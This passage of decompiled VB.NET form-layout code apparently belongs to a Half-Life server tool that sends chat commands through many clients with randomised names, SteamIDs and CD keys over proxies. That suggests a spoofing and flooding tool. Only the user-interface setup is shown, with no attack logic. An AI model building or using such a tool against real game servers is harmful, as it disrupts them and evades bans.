  636. Where Not String.IsNullOrEmpty(line)
  637. Select line)).ToString)
  638. End Sub
  639.  
  640. Private Sub InitializeComponent()
  641. Me.components = New Container
  642. Me.Label8 = New Label
  643. Me.MessageTxtBox = New TextBox
  644. Me.button2 = New Button
  645. Me.timer1 = New Timer(Me.components)
  646. Me.Button1 = New Button
  647. Me.timer2 = New Timer(Me.components)
  648. Me.groupBox5 = New GroupBox
  649. Me.LogRichBox = New RichTextBox
  650. Me.button4 = New Button
  651. Me.button5 = New Button
  652. Me.button6 = New Button
  653. Me.button7 = New Button
  654. Me.tabPage2 = New TabPage
  655. Me.groupBox3 = New GroupBox
  656. Me.runOnce = New CheckBox
  657. Me.checkBox17 = New CheckBox
  658. Me.textBox16 = New TextBox
  659. Me.checkBox19 = New CheckBox
  660. Me.checkBox18 = New CheckBox
  661. Me.label15 = New Label
  662. Me.checkBox16 = New CheckBox
  663. Me.saveSettings = New CheckBox
  664. Me.checkBox14 = New CheckBox
  665. Me.textBox8 = New TextBox
  666. Me.label2 = New Label
  667. Me.checkBox13 = New CheckBox
  668. Me.textBox6 = New TextBox
  669. Me.checkBox12 = New CheckBox
  670. Me.checkBox11 = New CheckBox
  671. Me.checkBox10 = New CheckBox
  672. Me.checkBox9 = New CheckBox
  673. Me.label10 = New Label
  674. Me.textBox9 = New TextBox
  675. Me.textBox4 = New TextBox
  676. Me.checkBox8 = New CheckBox
  677. Me.checkBox7 = New CheckBox
  678. Me.checkBox3 = New CheckBox
  679. Me.checkBox6 = New CheckBox
  680. Me.checkBox4 = New CheckBox
  681. Me.checkBox2 = New CheckBox
  682. Me.checkBox1 = New CheckBox
  683. Me.checkBox5 = New CheckBox
  684. Me.groupBox1 = New GroupBox
  685. Me.textBox12 = New TextBox
  686. Me.label20 = New Label
  687. Me.textBox11 = New TextBox
  688. Me.label19 = New Label
  689. Me.comboBox3 = New ComboBox
  690. Me.label17 = New Label
  691. Me.label16 = New Label
  692. Me.comboBox2 = New ComboBox
  693. Me.comboBox1 = New ComboBox
  694. Me.asd2 = New TextBox
  695. Me.label11 = New Label
  696. Me.textBox5 = New TextBox
  697. Me.label9 = New Label
  698. Me.textBox7 = New TextBox
  699. Me.label13 = New Label
  700. Me.label5 = New Label
  701. Me.textBox1 = New TextBox
  702. Me.textBox2 = New TextBox
  703. Me.label3 = New Label
  704. Me.Label7 = New Label
  705. Me.Label6 = New Label
  706. Me.ProtocolComboBox = New ComboBox
  707. Me.AuthtypeComboBox = New ComboBox
  708. Me.tabPage1 = New TabPage
  709. Me.groupBox2 = New GroupBox
  710. Me.textBox10 = New TextBox
  711. Me.label14 = New Label
  712. Me.Label4 = New Label
  713. Me.HLProxyRichBox = New TextBox
  714. Me.Label1 = New Label
  715. Me.NicknamesRichBox = New TextBox
  716. Me.ServerListRichBox = New TextBox
  717. Me.method = New ComboBox
  718. Me.label12 = New Label
  719. Me.textBox3 = New TextBox
  720. Me.tabControl1 = New TabControl
  721. Me.tabPage3 = New TabPage
  722. Me.tabPage4 = New TabPage
  723. Me.label21 = New Label
  724. Me.label18 = New Label
  725. Me.button8 = New Button
  726. Me.textBox14 = New TextBox
  727. Me.textBox13 = New TextBox
  728. Me.tabPage5 = New TabPage
  729. Me.groupBox5.SuspendLayout
  730. Me.tabPage2.SuspendLayout
  731. Me.groupBox3.SuspendLayout
  732. Me.groupBox1.SuspendLayout
  733. Me.tabPage1.SuspendLayout
  734. Me.groupBox2.SuspendLayout
  735. Me.tabControl1.SuspendLayout
  736. Me.tabPage3.SuspendLayout
  737. Me.tabPage4.SuspendLayout
  738. Me.tabPage5.SuspendLayout
  739. MyBase.SuspendLayout
  740. Me.Label8.AutoSize = True
  741. Me.Label8.Font = New Font("Calibri", 8.25!)
  742. Me.Label8.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  743. Me.Label8.Location = New Point(13, &HEE)
  744. Me.Label8.Margin = New Padding(2, 0, 2, 0)
  745. Me.Label8.Name = "Label8"
  746. Me.Label8.Size = New Size(&H3A, 13)
  747. Me.Label8.TabIndex = &H39
  748. Me.Label8.Text = "Command:"
  749. Me.MessageTxtBox.BackColor = Color.FromArgb(&H1A, &H20, 40)
  750. Me.MessageTxtBox.BorderStyle = BorderStyle.FixedSingle
  751. Me.MessageTxtBox.Enabled = False
  752. Me.MessageTxtBox.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  753. Me.MessageTxtBox.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  754. Me.MessageTxtBox.Location = New Point(&H4F, &HEB)
  755. Me.MessageTxtBox.Margin = New Padding(2)
  756. Me.MessageTxtBox.MaxLength = &H1869F
  757. Me.MessageTxtBox.Name = "MessageTxtBox"
  758. Me.MessageTxtBox.Size = New Size(&H175, &H15)
  759. Me.MessageTxtBox.TabIndex = &H3A
  760. Me.MessageTxtBox.Text = "say_team @ Hello guys"
  761. AddHandler Me.MessageTxtBox.TextChanged, New EventHandler(AddressOf Me.MessageTxtBox_TextChanged)
  762. Me.button2.FlatStyle = FlatStyle.Popup
  763. Me.button2.Font = New Font("Calibri", 8.25!)
  764. Me.button2.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  765. Me.button2.Location = New Point(&H107, &H155)
  766. Me.button2.Margin = New Padding(2)
  767. Me.button2.Name = "button2"
  768. Me.button2.Size = New Size(220, &H48)
  769. Me.button2.TabIndex = &H35
  770. Me.button2.Text = "Stop"
  771. Me.button2.UseVisualStyleBackColor = True
  772. AddHandler Me.button2.Click, New EventHandler(AddressOf Me.button2_Click_1)
  773. AddHandler Me.timer1.Tick, New EventHandler(AddressOf Me.timer1_Tick_1)
  774. Me.Button1.FlatStyle = FlatStyle.Popup
  775. Me.Button1.Font = New Font("Calibri", 8.25!)
  776. Me.Button1.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  777. Me.Button1.Location = New Point(&H10, &H155)
  778. Me.Button1.Margin = New Padding(2)
  779. Me.Button1.Name = "Button1"
  780. Me.Button1.Size = New Size(&HDE, &H48)
  781. Me.Button1.TabIndex = &H34
  782. Me.Button1.Text = "Send"
  783. Me.Button1.UseVisualStyleBackColor = True
  784. AddHandler Me.Button1.Click, New EventHandler(AddressOf Me.Button1_Click)
  785. AddHandler Me.timer2.Tick, New EventHandler(AddressOf Me.timer2_Tick_1)
  786. Me.groupBox5.Controls.Add(Me.LogRichBox)
  787. Me.groupBox5.Controls.Add(Me.button4)
  788. Me.groupBox5.Controls.Add(Me.button5)
  789. Me.groupBox5.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  790. Me.groupBox5.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  791. Me.groupBox5.Location = New Point(4, 2)
  792. Me.groupBox5.Name = "groupBox5"
  793. Me.groupBox5.Size = New Size(&H1CF, &H111)
  794. Me.groupBox5.TabIndex = &H2721
  795. Me.groupBox5.TabStop = False
  796. Me.groupBox5.Text = "Console"
  797. AddHandler Me.groupBox5.Enter, New EventHandler(AddressOf Me.groupBox5_Enter)
  798. Me.LogRichBox.BackColor = Color.FromArgb(&H1A, &H20, 40)
  799. Me.LogRichBox.BorderStyle = BorderStyle.FixedSingle
  800. Me.LogRichBox.Font = New Font("Calibri", 9!, FontStyle.Regular, GraphicsUnit.Point, 0)
  801. Me.LogRichBox.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  802. Me.LogRichBox.Location = New Point(6, 14)
  803. Me.LogRichBox.Name = "LogRichBox"
  804. Me.LogRichBox.Size = New Size(450, &HDE)
  805. Me.LogRichBox.TabIndex = &H2715
  806. Me.LogRichBox.Text = ""
  807. AddHandler Me.LogRichBox.TextChanged, New EventHandler(AddressOf Me.LogRichBox_TextChanged_2)
  808. Me.button4.FlatStyle = FlatStyle.Flat
  809. Me.button4.Location = New Point(&H14C, &HF2)
  810. Me.button4.Name = "button4"
  811. Me.button4.Size = New Size(&H3B, &H17)
  812. Me.button4.TabIndex = &H3E
  813. Me.button4.Text = "View log"
  814. Me.button4.UseVisualStyleBackColor = True
  815. AddHandler Me.button4.Click, New EventHandler(AddressOf Me.button4_Click)
  816. AddHandler Me.button4.MouseClick, New MouseEventHandler(AddressOf Me.button4_MouseClick)
  817. Me.button5.FlatStyle = FlatStyle.Flat
  818. Me.button5.Location = New Point(&H18D, &HF2)
  819. Me.button5.Name = "button5"
  820. Me.button5.Size = New Size(&H3B, &H17)
  821. Me.button5.TabIndex = &H3D
  822. Me.button5.Text = "Clear"
  823. Me.button5.UseVisualStyleBackColor = True
  824. AddHandler Me.button5.Click, New EventHandler(AddressOf Me.button5_Click)
  825. Me.button6.BackColor = Color.FromArgb(&HBD, &HC3, &HC7)
  826. Me.button6.FlatStyle = FlatStyle.Popup
  827. Me.button6.Font = New Font("Calibri", 8.25!)
  828. Me.button6.ForeColor = Color.FromArgb(&H1A, &H20, 40)
  829. Me.button6.Location = New Point(3, 1)
  830. Me.button6.Margin = New Padding(2)
  831. Me.button6.Name = "button6"
  832. Me.button6.Size = New Size(&H1ED, 20)
  833. Me.button6.TabIndex = &H2722
  834. Me.button6.Text = "La7wa Edition"
  835. Me.button6.UseVisualStyleBackColor = False
  836. AddHandler Me.button6.Click, New EventHandler(AddressOf Me.button6_Click)
  837. AddHandler Me.button6.MouseMove, New MouseEventHandler(AddressOf Me.button6_MouseMove)
  838. Me.button7.BackColor = Color.Red
  839. Me.button7.FlatStyle = FlatStyle.Popup
  840. Me.button7.Font = New Font("Calibri", 8.25!)
  841. Me.button7.ForeColor = Color.FromArgb(&H1A, &H20, 40)
  842. Me.button7.Location = New Point(&H1BC, 1)
  843. Me.button7.Margin = New Padding(2)
  844. Me.button7.Name = "button7"
  845. Me.button7.Size = New Size(&H34, 20)
  846. Me.button7.TabIndex = &H2723
  847. Me.button7.Text = "Close"
  848. Me.button7.UseVisualStyleBackColor = False
  849. AddHandler Me.button7.Click, New EventHandler(AddressOf Me.button7_Click)
  850. AddHandler Me.button7.MouseClick, New MouseEventHandler(AddressOf Me.button7_MouseClick)
  851. Me.tabPage2.BackColor = Color.FromArgb(&H1A, &H20, 40)
  852. Me.tabPage2.Controls.Add(Me.groupBox3)
  853. Me.tabPage2.Location = New Point(4, &H16)
  854. Me.tabPage2.Name = "tabPage2"
  855. Me.tabPage2.Padding = New Padding(3)
  856. Me.tabPage2.Size = New Size(&H1D9, &H119)
  857. Me.tabPage2.TabIndex = 1
  858. Me.tabPage2.Text = "Settings"
  859. Me.groupBox3.BackColor = Color.Green
  860. Me.groupBox3.Controls.Add(Me.runOnce)
  861. Me.groupBox3.Controls.Add(Me.checkBox17)
  862. Me.groupBox3.Controls.Add(Me.textBox16)
  863. Me.groupBox3.Controls.Add(Me.checkBox19)
  864. Me.groupBox3.Controls.Add(Me.checkBox18)
  865. Me.groupBox3.Controls.Add(Me.label15)
  866. Me.groupBox3.Controls.Add(Me.checkBox16)
  867. Me.groupBox3.Controls.Add(Me.saveSettings)
  868. Me.groupBox3.Controls.Add(Me.checkBox14)
  869. Me.groupBox3.Controls.Add(Me.textBox8)
  870. Me.groupBox3.Controls.Add(Me.label2)
  871. Me.groupBox3.Controls.Add(Me.checkBox13)
  872. Me.groupBox3.Controls.Add(Me.textBox6)
  873. Me.groupBox3.Controls.Add(Me.checkBox12)
  874. Me.groupBox3.Controls.Add(Me.checkBox11)
  875. Me.groupBox3.Controls.Add(Me.checkBox10)
  876. Me.groupBox3.Controls.Add(Me.checkBox9)
  877. Me.groupBox3.Controls.Add(Me.label10)
  878. Me.groupBox3.Controls.Add(Me.textBox9)
  879. Me.groupBox3.Controls.Add(Me.textBox4)
  880. Me.groupBox3.Controls.Add(Me.checkBox8)
  881. Me.groupBox3.Controls.Add(Me.checkBox7)
  882. Me.groupBox3.Controls.Add(Me.checkBox3)
  883. Me.groupBox3.Controls.Add(Me.checkBox6)
  884. Me.groupBox3.Controls.Add(Me.checkBox4)
  885. Me.groupBox3.Controls.Add(Me.checkBox2)
  886. Me.groupBox3.Controls.Add(Me.checkBox1)
  887. Me.groupBox3.Controls.Add(Me.checkBox5)
  888. Me.groupBox3.FlatStyle = FlatStyle.Popup
  889. Me.groupBox3.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  890. Me.groupBox3.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  891. Me.groupBox3.Location = New Point(6, 5)
  892. Me.groupBox3.Name = "groupBox3"
  893. Me.groupBox3.Size = New Size(&H1CD, 270)
  894. Me.groupBox3.TabIndex = &H33
  895. Me.groupBox3.TabStop = False
  896. Me.groupBox3.Text = "Settings"
  897. AddHandler Me.groupBox3.Enter, New EventHandler(AddressOf Me.groupBox3_Enter)
  898. Me.runOnce.AutoSize = True
  899. Me.runOnce.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  900. Me.runOnce.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  901. Me.runOnce.Location = New Point(&HE8, &HDE)
  902. Me.runOnce.Name = "runOnce"
  903. Me.runOnce.Size = New Size(70, &H11)
  904. Me.runOnce.TabIndex = &H272E
  905. Me.runOnce.Text = "Run Once"
  906. Me.runOnce.UseVisualStyleBackColor = True
  907. Me.checkBox17.AutoSize = True
  908. Me.checkBox17.Checked = True
  909. Me.checkBox17.CheckState = CheckState.Checked
  910. Me.checkBox17.Location = New Point(&H155, &HDE)
  911. Me.checkBox17.Name = "checkBox17"
  912. Me.checkBox17.Size = New Size(&H37, &H11)
  913. Me.checkBox17.TabIndex = &H272D
  914. Me.checkBox17.Text = "Value:"
  915. Me.checkBox17.UseVisualStyleBackColor = True
  916. AddHandler Me.checkBox17.CheckedChanged, New EventHandler(AddressOf Me.checkBox17_CheckedChanged_1)
  917. Me.textBox16.BackColor = Color.FromArgb(&H1A, &H20, 40)
  918. Me.textBox16.BorderStyle = BorderStyle.FixedSingle
  919. Me.textBox16.Cursor = Cursors.Default
  920. Me.textBox16.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  921. Me.textBox16.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  922. Me.textBox16.Location = New Point(&H194, &HDD)
  923. Me.textBox16.Margin = New Padding(2)
  924. Me.textBox16.MaxLength = 4
  925. Me.textBox16.Multiline = True
  926. Me.textBox16.Name = "textBox16"
  927. Me.textBox16.Size = New Size(&H2C, &H13)
  928. Me.textBox16.TabIndex = &H272C
  929. Me.textBox16.Text = "15"
  930. Me.checkBox19.AutoSize = True
  931. Me.checkBox19.Checked = True
  932. Me.checkBox19.CheckState = CheckState.Checked
  933. Me.checkBox19.Location = New Point(15, &HDE)
  934. Me.checkBox19.Name = "checkBox19"
  935. Me.checkBox19.Size = New Size(&H63, &H11)
  936. Me.checkBox19.TabIndex = &H2726
  937. Me.checkBox19.Text = "Follow Redirect"
  938. Me.checkBox19.UseVisualStyleBackColor = True
  939. Me.checkBox18.AutoSize = True
  940. Me.checkBox18.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  941. Me.checkBox18.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  942. Me.checkBox18.Location = New Point(&H155, &HB0)
  943. Me.checkBox18.Name = "checkBox18"
  944. Me.checkBox18.Size = New Size(&H4E, &H11)
  945. Me.checkBox18.TabIndex = &H2725
  946. Me.checkBox18.Text = "UTF8 Name"
  947. Me.checkBox18.UseVisualStyleBackColor = True
  948. AddHandler Me.checkBox18.CheckedChanged, New EventHandler(AddressOf Me.checkBox18_CheckedChanged)
  949. Me.label15.AutoSize = True
  950. Me.label15.Font = New Font("Calibri", 8.25!)
  951. Me.label15.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  952. Me.label15.Location = New Point(11, &H36)
  953. Me.label15.Margin = New Padding(2, 0, 2, 0)
  954. Me.label15.Name = "label15"
  955. Me.label15.Size = New Size(50, 13)
  956. Me.label15.TabIndex = &H2713
  957. Me.label15.Text = "SteamID:"
  958. Me.checkBox16.AutoSize = True
  959. Me.checkBox16.Location = New Point(15, &HC7)
  960. Me.checkBox16.Name = "checkBox16"
  961. Me.checkBox16.Size = New Size(90, &H11)
  962. Me.checkBox16.TabIndex = &H2723
  963. Me.checkBox16.Text = "Recive setinfo"
  964. Me.checkBox16.UseVisualStyleBackColor = True
  965. Me.saveSettings.AutoSize = True
  966. Me.saveSettings.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  967. Me.saveSettings.Location = New Point(120, &HC6)
  968. Me.saveSettings.Name = "saveSettings"
  969. Me.saveSettings.Size = New Size(&H6C, &H11)
  970. Me.saveSettings.TabIndex = &H2722
  971. Me.saveSettings.Text = "AutoSave Settings"
  972. Me.saveSettings.UseVisualStyleBackColor = True
  973. AddHandler Me.saveSettings.CheckedChanged, New EventHandler(AddressOf Me.checkBox15_CheckedChanged)
  974. Me.checkBox14.AutoSize = True
  975. Me.checkBox14.Font = New Font("Calibri", 8.25!, (FontStyle.Italic Or FontStyle.Bold), GraphicsUnit.Point, 0)
  976. Me.checkBox14.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  977. Me.checkBox14.Location = New Point(&HE8, &HC7)
  978. Me.checkBox14.Name = "checkBox14"
  979. Me.checkBox14.Size = New Size(&H52, &H11)
  980. Me.checkBox14.TabIndex = &H2721
  981. Me.checkBox14.Text = "SteamClient"
  982. Me.checkBox14.UseVisualStyleBackColor = True
  983. AddHandler Me.checkBox14.CheckedChanged, New EventHandler(AddressOf Me.checkBox14_CheckedChanged_1)
  984. Me.textBox8.BackColor = Color.Maroon
  985. Me.textBox8.BorderStyle = BorderStyle.FixedSingle
  986. Me.textBox8.Cursor = Cursors.IBeam
  987. Me.textBox8.Enabled = False
  988. Me.textBox8.Font = New Font("Calibri", 8.25!)
  989. Me.textBox8.ForeColor = Color.White
  990. Me.textBox8.Location = New Point(&H4E, &H33)
  991. Me.textBox8.Margin = New Padding(2)
  992. Me.textBox8.MaxLength = &H2D
  993. Me.textBox8.Multiline = True
  994. Me.textBox8.Name = "textBox8"
  995. Me.textBox8.Size = New Size(&H171, 20)
  996. Me.textBox8.TabIndex = 0
  997. Me.label2.AutoSize = True
  998. Me.label2.Font = New Font("Calibri", 8.25!)
  999. Me.label2.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1000. Me.label2.Location = New Point(9, &H55)
  1001. Me.label2.Margin = New Padding(2, 0, 2, 0)
  1002. Me.label2.Name = "label2"
  1003. Me.label2.Size = New Size(&H38, 13)
  1004. Me.label2.TabIndex = &H2711
  1005. Me.label2.Text = "Password:"
  1006. Me.checkBox13.AutoSize = True
  1007. Me.checkBox13.Checked = True
  1008. Me.checkBox13.CheckState = CheckState.Checked
  1009. Me.checkBox13.Location = New Point(120, &HDE)
  1010. Me.checkBox13.Name = "checkBox13"
  1011. Me.checkBox13.Size = New Size(&H69, &H11)
  1012. Me.checkBox13.TabIndex = &H2720
  1013. Me.checkBox13.Text = "Advanced Packet"
  1014. Me.checkBox13.UseVisualStyleBackColor = True
  1015. Me.textBox6.BackColor = Color.Maroon
  1016. Me.textBox6.BorderStyle = BorderStyle.FixedSingle
  1017. Me.textBox6.Font = New Font("Calibri", 8.25!)
  1018. Me.textBox6.ForeColor = Color.White
  1019. Me.textBox6.Location = New Point(&H4E, 80)
  1020. Me.textBox6.Margin = New Padding(2)
  1021. Me.textBox6.MaxLength = &H20
  1022. Me.textBox6.Name = "textBox6"
  1023. Me.textBox6.Size = New Size(&H171, &H15)
  1024. Me.textBox6.TabIndex = &H2711
  1025. Me.textBox6.Text = "sv_password"
  1026. Me.checkBox12.AutoSize = True
  1027. Me.checkBox12.Checked = True
  1028. Me.checkBox12.CheckState = CheckState.Checked
  1029. Me.checkBox12.Location = New Point(&HE8, &HB0)
  1030. Me.checkBox12.Name = "checkBox12"
  1031. Me.checkBox12.Size = New Size(&H61, &H11)
  1032. Me.checkBox12.TabIndex = &H271F
  1033. Me.checkBox12.Text = "Create file log's"
  1034. Me.checkBox12.UseVisualStyleBackColor = True
  1035. Me.checkBox11.AutoSize = True
  1036. Me.checkBox11.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1037. Me.checkBox11.Location = New Point(&H155, &H99)
  1038. Me.checkBox11.Name = "checkBox11"
  1039. Me.checkBox11.Size = New Size(&H56, &H11)
  1040. Me.checkBox11.TabIndex = &H271E
  1041. Me.checkBox11.Text = "Name Invalid"
  1042. Me.checkBox11.UseVisualStyleBackColor = True
  1043. AddHandler Me.checkBox11.CheckedChanged, New EventHandler(AddressOf Me.checkBox11_CheckedChanged)
  1044. Me.checkBox10.AutoSize = True
  1045. Me.checkBox10.Location = New Point(15, &HB0)
  1046. Me.checkBox10.Name = "checkBox10"
  1047. Me.checkBox10.Size = New Size(&H4C, &H11)
  1048. Me.checkBox10.TabIndex = &H271D
  1049. Me.checkBox10.Text = "Check ping"
  1050. Me.checkBox10.UseVisualStyleBackColor = True
  1051. AddHandler Me.checkBox10.CheckedChanged, New EventHandler(AddressOf Me.checkBox10_CheckedChanged)
  1052. Me.checkBox9.AutoSize = True
  1053. Me.checkBox9.Location = New Point(&H155, &HC7)
  1054. Me.checkBox9.Name = "checkBox9"
  1055. Me.checkBox9.Size = New Size(&H3B, &H11)
  1056. Me.checkBox9.TabIndex = &H271C
  1057. Me.checkBox9.Text = "Repeat"
  1058. Me.checkBox9.UseVisualStyleBackColor = True
  1059. AddHandler Me.checkBox9.CheckedChanged, New EventHandler(AddressOf Me.checkBox9_CheckedChanged)
  1060. Me.label10.AutoSize = True
  1061. Me.label10.Font = New Font("Calibri", 8.25!)
  1062. Me.label10.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1063. Me.label10.Location = New Point(12, &H1A)
  1064. Me.label10.Margin = New Padding(2, 0, 2, 0)
  1065. Me.label10.Name = "label10"
  1066. Me.label10.Size = New Size(40, 13)
  1067. Me.label10.TabIndex = &H2A
  1068. Me.label10.Text = "CDKey:"
  1069. Me.textBox9.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1070. Me.textBox9.BorderStyle = BorderStyle.FixedSingle
  1071. Me.textBox9.Cursor = Cursors.Default
  1072. Me.textBox9.Enabled = False
  1073. Me.textBox9.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1074. Me.textBox9.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1075. Me.textBox9.Location = New Point(&H194, &HC6)
  1076. Me.textBox9.Margin = New Padding(2)
  1077. Me.textBox9.MaxLength = 4
  1078. Me.textBox9.Multiline = True
  1079. Me.textBox9.Name = "textBox9"
  1080. Me.textBox9.Size = New Size(&H2C, &H13)
  1081. Me.textBox9.TabIndex = &H271B
  1082. Me.textBox9.Text = "1"
  1083. AddHandler Me.textBox9.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1084. Me.textBox4.BackColor = Color.Maroon
  1085. Me.textBox4.BorderStyle = BorderStyle.FixedSingle
  1086. Me.textBox4.Cursor = Cursors.IBeam
  1087. Me.textBox4.Font = New Font("Calibri", 8.25!)
  1088. Me.textBox4.ForeColor = Color.White
  1089. Me.textBox4.Location = New Point(&H4E, &H15)
  1090. Me.textBox4.Margin = New Padding(2)
  1091. Me.textBox4.MaxLength = &H2D
  1092. Me.textBox4.Multiline = True
  1093. Me.textBox4.Name = "textBox4"
  1094. Me.textBox4.Size = New Size(&H171, 20)
  1095. Me.textBox4.TabIndex = &H2710
  1096. Me.checkBox8.AutoSize = True
  1097. Me.checkBox8.Checked = True
  1098. Me.checkBox8.CheckState = CheckState.Checked
  1099. Me.checkBox8.Location = New Point(120, &HB0)
  1100. Me.checkBox8.Name = "checkBox8"
  1101. Me.checkBox8.Size = New Size(&H6A, &H11)
  1102. Me.checkBox8.TabIndex = &H2715
  1103. Me.checkBox8.Text = "COM_Munge filrt"
  1104. Me.checkBox8.UseVisualStyleBackColor = True
  1105. Me.checkBox7.AutoSize = True
  1106. Me.checkBox7.Checked = True
  1107. Me.checkBox7.CheckState = CheckState.Checked
  1108. Me.checkBox7.Location = New Point(15, &H9A)
  1109. Me.checkBox7.Name = "checkBox7"
  1110. Me.checkBox7.Size = New Size(&H61, &H11)
  1111. Me.checkBox7.TabIndex = &H2714
  1112. Me.checkBox7.Text = "Recive connect"
  1113. Me.checkBox7.UseVisualStyleBackColor = True
  1114. AddHandler Me.checkBox7.CheckedChanged, New EventHandler(AddressOf Me.checkBox7_CheckedChanged)
  1115. Me.checkBox3.AutoSize = True
  1116. Me.checkBox3.Checked = True
  1117. Me.checkBox3.CheckState = CheckState.Checked
  1118. Me.checkBox3.Location = New Point(&H155, &H83)
  1119. Me.checkBox3.Name = "checkBox3"
  1120. Me.checkBox3.Size = New Size(&H60, &H11)
  1121. Me.checkBox3.TabIndex = &H2A
  1122. Me.checkBox3.Text = "Random CDKEY"
  1123. Me.checkBox3.UseVisualStyleBackColor = True
  1124. AddHandler Me.checkBox3.CheckedChanged, New EventHandler(AddressOf Me.checkBox3_CheckedChanged)
  1125. Me.checkBox6.AutoSize = True
  1126. Me.checkBox6.Location = New Point(&HE8, &H9A)
  1127. Me.checkBox6.Name = "checkBox6"
  1128. Me.checkBox6.Size = New Size(80, &H11)
  1129. Me.checkBox6.TabIndex = &H33
  1130. Me.checkBox6.Text = "HLTV-Client"
  1131. Me.checkBox6.UseVisualStyleBackColor = True
  1132. AddHandler Me.checkBox6.CheckedChanged, New EventHandler(AddressOf Me.checkBox6_CheckedChanged)
  1133. Me.checkBox4.AutoSize = True
  1134. Me.checkBox4.Location = New Point(120, &H9A)
  1135. Me.checkBox4.Name = "checkBox4"
  1136. Me.checkBox4.Size = New Size(&H6A, &H11)
  1137. Me.checkBox4.TabIndex = 40
  1138. Me.checkBox4.Text = "HLProxy/HLSocks"
  1139. Me.checkBox4.UseVisualStyleBackColor = True
  1140. AddHandler Me.checkBox4.CheckedChanged, New EventHandler(AddressOf Me.checkBox4_CheckedChanged_1)
  1141. Me.checkBox2.AutoSize = True
  1142. Me.checkBox2.Checked = True
  1143. Me.checkBox2.CheckState = CheckState.Checked
  1144. Me.checkBox2.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1145. Me.checkBox2.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1146. Me.checkBox2.Location = New Point(&HE8, &H83)
  1147. Me.checkBox2.Name = "checkBox2"
  1148. Me.checkBox2.Size = New Size(&H69, &H11)
  1149. Me.checkBox2.TabIndex = &H29
  1150. Me.checkBox2.Text = "Random SteamID"
  1151. Me.checkBox2.UseVisualStyleBackColor = True
  1152. AddHandler Me.checkBox2.CheckedChanged, New EventHandler(AddressOf Me.checkBox2_CheckedChanged)
  1153. Me.checkBox1.AutoSize = True
  1154. Me.checkBox1.Checked = True
  1155. Me.checkBox1.CheckState = CheckState.Checked
  1156. Me.checkBox1.Location = New Point(15, &H83)
  1157. Me.checkBox1.Name = "checkBox1"
  1158. Me.checkBox1.Size = New Size(&H5D, &H11)
  1159. Me.checkBox1.TabIndex = 40
  1160. Me.checkBox1.Text = "Random Name"
  1161. Me.checkBox1.UseVisualStyleBackColor = True
  1162. AddHandler Me.checkBox1.CheckedChanged, New EventHandler(AddressOf Me.checkBox1_CheckedChanged)
  1163. Me.checkBox5.AutoSize = True
  1164. Me.checkBox5.Location = New Point(120, &H83)
  1165. Me.checkBox5.Name = "checkBox5"
  1166. Me.checkBox5.Size = New Size(&H65, &H11)
  1167. Me.checkBox5.TabIndex = &H2713
  1168. Me.checkBox5.Text = "Password Server"
  1169. Me.checkBox5.UseVisualStyleBackColor = True
  1170. AddHandler Me.checkBox5.CheckedChanged, New EventHandler(AddressOf Me.checkBox5_CheckedChanged_1)
  1171. Me.groupBox1.BackColor = Color.Green
  1172. Me.groupBox1.Controls.Add(Me.textBox12)
  1173. Me.groupBox1.Controls.Add(Me.label20)
  1174. Me.groupBox1.Controls.Add(Me.textBox11)
  1175. Me.groupBox1.Controls.Add(Me.label19)
  1176. Me.groupBox1.Controls.Add(Me.comboBox3)
  1177. Me.groupBox1.Controls.Add(Me.label17)
  1178. Me.groupBox1.Controls.Add(Me.label16)
  1179. Me.groupBox1.Controls.Add(Me.comboBox2)
  1180. Me.groupBox1.Controls.Add(Me.comboBox1)
  1181. Me.groupBox1.Controls.Add(Me.asd2)
  1182. Me.groupBox1.Controls.Add(Me.label11)
  1183. Me.groupBox1.Controls.Add(Me.textBox5)
  1184. Me.groupBox1.Controls.Add(Me.label9)
  1185. Me.groupBox1.Controls.Add(Me.textBox7)
  1186. Me.groupBox1.Controls.Add(Me.label13)
  1187. Me.groupBox1.Controls.Add(Me.label5)
  1188. Me.groupBox1.Controls.Add(Me.textBox1)
  1189. Me.groupBox1.Controls.Add(Me.textBox2)
  1190. Me.groupBox1.Controls.Add(Me.label3)
  1191. Me.groupBox1.Controls.Add(Me.Label7)
  1192. Me.groupBox1.Controls.Add(Me.Label6)
  1193. Me.groupBox1.Controls.Add(Me.ProtocolComboBox)
  1194. Me.groupBox1.Controls.Add(Me.AuthtypeComboBox)
  1195. Me.groupBox1.Font = New Font("Calibri", 8.25!, (FontStyle.Italic Or FontStyle.Bold), GraphicsUnit.Point, 0)
  1196. Me.groupBox1.ForeColor = Color.White
  1197. Me.groupBox1.Location = New Point(6, 6)
  1198. Me.groupBox1.Name = "groupBox1"
  1199. Me.groupBox1.Size = New Size(&H1CD, &H10D)
  1200. Me.groupBox1.TabIndex = &H37
  1201. Me.groupBox1.TabStop = False
  1202. Me.groupBox1.Text = "Authentication"
  1203. Me.textBox12.BackColor = Color.FromArgb(&H1A, &H20, 40)
